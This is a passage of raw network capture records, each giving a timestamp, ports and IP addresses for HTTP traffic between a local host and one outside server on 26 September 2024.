Sep 26, 2024 00:39:08.048116922 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.048125982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.048170090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.048170090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.048346996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172080040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172100067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172117949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172127962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172139883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172152042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172163963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172163010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172182083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172194004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172205925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172216892 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172226906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172250986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172250986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172270060 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172283888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172296047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172307014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172323942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172363043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172368050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172379971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172389984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172400951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172411919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172416925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172440052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172450066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172451973 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172461987 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172467947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172475100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.172504902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172504902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.172553062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296324968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296344042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296361923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296371937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296386957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296413898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296425104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296437025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296447992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296458960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296492100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296493053 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296510935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296528101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296541929 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296559095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296576023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296597958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296598911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296612024 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296622992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296633005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296643019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296648979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296658993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296669006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296669006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296669960 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296680927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296691895 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296699047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296709061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296717882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296746016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296753883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296753883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296758890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296771049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296781063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296792030 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.296799898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296816111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.296869993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297003031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297043085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297055006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297065020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297085047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297096968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297099113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297132969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297185898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297193050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297239065 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297245979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297256947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297318935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297328949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297338009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297339916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297353029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297357082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297374010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297426939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297437906 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297445059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297449112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297461033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297472000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297472000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297482014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297492981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297514915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297516108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297540903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297548056 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297554970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297564983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297576904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.297615051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297615051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.297641993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420712948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420730114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420748949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420759916 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420772076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420783043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420783997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420799017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420819044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420828104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420835972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420835972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420839071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420850992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420860052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420862913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420876026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420882940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420887947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420902014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.420952082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.420994043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421003103 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421053886 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421061993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421072006 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421082020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421093941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421118975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421124935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421124935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421129942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421139956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421148062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421152115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421164989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421185970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421206951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421206951 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421219110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421228886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421240091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421250105 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421273947 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421333075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421344995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421355009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421365023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421375036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421384096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421391010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421395063 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421406031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421406984 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421458006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421458006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421511889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421523094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421533108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421544075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421554089 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421561003 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421565056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421576977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421586037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421597958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421618938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421618938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421626091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421637058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421653032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421663046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421669960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421669960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421672106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421683073 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421694040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421704054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421714067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421724081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421734095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421737909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421737909 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421746016 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421791077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421791077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421917915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421928883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421937943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421947956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421958923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421968937 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421969891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421981096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.421983957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.421992064 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422003031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422013044 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422023058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422034025 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422034025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422034025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422069073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422069073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422111034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422122002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422132969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422142982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422153950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422163010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422172070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422173977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422173977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422183037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422205925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422228098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422240019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422260046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422264099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422264099 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422271013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422287941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422298908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422300100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422310114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422321081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422331095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422342062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422357082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422357082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422383070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422383070 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422476053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422487974 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422498941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422508955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422518969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422528028 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422529936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422540903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422540903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422552109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422561884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422573090 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422588110 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422619104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422619104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422689915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422699928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422709942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422719955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422729969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422729969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422739983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422750950 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422761917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422771931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422781944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422781944 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422781944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422794104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422797918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422805071 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422816992 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422837019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422837019 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422840118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.422888994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.422888994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544516087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544543982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544553995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544564962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544576883 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544586897 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544622898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544668913 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544681072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544699907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544712067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544723034 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544730902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544734001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544770956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544775009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544785976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544812918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544822931 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544823885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544867992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544867992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544883966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544897079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544908047 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544917107 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544929981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544940948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.544948101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544948101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544977903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.544997931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545008898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545021057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545067072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545067072 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:08.545123100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545133114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545144081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545155048 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:08.545165062 CEST	80	49730	185.215.113.37	192.168.2.4
